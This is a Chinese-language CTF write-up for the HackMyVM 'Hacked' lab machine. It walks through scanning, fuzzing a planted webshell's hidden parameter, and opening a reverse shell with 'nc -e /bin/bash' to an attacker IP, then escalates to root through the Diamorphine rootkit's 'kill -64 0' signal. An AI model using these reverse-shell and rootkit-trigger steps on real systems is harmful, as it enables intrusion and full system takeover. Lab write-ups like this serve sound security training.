【hackmyvm】hacked靶机wp

---

tags:

• HMV
• rootkit
• Diamorphine
  Type: wp

1. 基本信息^toc

文章目录

• • [1. 基本信息^toc](#1. 基本信息^toc)
  • [2. 信息收集](#2. 信息收集)
  • • [2.1. 端口扫描](#2.1. 端口扫描)
    • [2.2. 目录扫描](#2.2. 目录扫描)
    • [2.3. 获取参数](#2.3. 获取参数)
  • [3. 提权](#3. 提权)

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Hacked
作者 sml
难度 ⭐️⭐️⭐️⭐️️

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# fscan -h 192.168.42.185

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.42.185:22 open
192.168.42.185:80 open

主页

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/
HACKED BY h4x0r

2.2. 目录扫描

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# dirsearch -u http://192.168.42.185/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/hmv/hacked/reports/http_192.168.42.185/__24-12-01_18-09-55.txt

Target: http://192.168.42.185/

[18:09:55] Starting:
[18:10:13] 200 -   16B  - /robots.txt
[18:10:14] 302 -   62B  - /simple-backdoor.php  ->  /

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/robots.txt
/secretnote.txt

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//secretnote.txt
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.
 |__> Webshell installed.
 |__> Root shell created.

-h4x0r

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//simple-backdoor.php
I modified this webshell to only execute my secret parameter.

收集到的信息

用户 h4x0r 
webshell    /simple-backdoor.php
执行参数 未知

2.3. 获取参数

从收集的这些信息当中猜测Webshell的参数

试了几个参数都不对。猜测可能是需要爆破才行

┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# ffuf -u http://192.168.42.185/simple-backdoor.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt |grep -v "Size: 62"

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.42.185/simple-backdoor.php?FUZZ=id
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

secret                  [Status: 302, Size: 115, Words: 12, Lines: 2, Duration: 19ms]

获取到参数是 secret 之前有在网页试过这个参数。应该是302了导致没有显示出来

抓包的话可以看到

弹shell

nc -e /bin/bash 192.168.42.39 1111
nc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201111

[18:42:48] Welcome to pwncat 🐈!                                                              __main__.py:164
[18:46:34] received connection from 192.168.42.185:36606                                           bind.py:84
[18:46:35] 192.168.42.185:36606: registered new host w/ db                                     manager.py:957
(local) pwncat$
(remote) www-data@hacked:/var/www/html$ whoami
www-data
(remote) www-data@hacked:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@hacked:/var/www/html$

3. 提权

这靶机上gcc编译不了。找不到Ld

可以尝试从其他版本相近的靶机编译后传过来。

这里我就不尝试了

使用linpeas进行检测。也没有发现什么利用点

去看一下wp才发现原来这里存在Rootkit

https://github.com/m0nad/Diamorphine

kill -63 0 取消隐藏进程
lsmod 列出加载到内核中的模块

可以看到确实安装了[[.../.../26-工具使用/Diamorphine使用|Diamorphine]]

\[.../.../26-工具使用/Diamorphine使用\|海洛因\]\]有一个特征  我们发送信号64即可获取到root ```bash (remote) www-data@hacked:/tmp$ kill -64 0 (remote) root@hacked:/tmp$ id uid=0(root) gid=0(root) groups=0(root),33(www-data) ``` ```bash (remote) root@hacked:/root$ sh flag.sh . ** * *. ,* *, , ,* ., *, / * ,* *, /. .*. * ** ,* ,* ** *. ** **. ,* ** *, ,* * ** *, .* *. ** ** ,*, ** *, ------------------------- PWNED HOST: hacked PWNED DATE: Sun Dec 1 06:32:33 EST 2024 WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data) FLAG: HMVhackingthehacker ------------------------ remote) root@hacked:/home/h4x0r$ sh flag.sh . ** * *. ,* *, , ,* ., *, / * ,* *, /. .*. * ** ,* ,* ** *. ** **. ,* ** *, ,* * ** *, .* *. ** ** ,*, ** *, ------------------------- PWNED HOST: hacked PWNED DATE: Sun Dec 1 06:32:55 EST 2024 WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data) FLAG: HMVimthabesthacker ------------------------ ```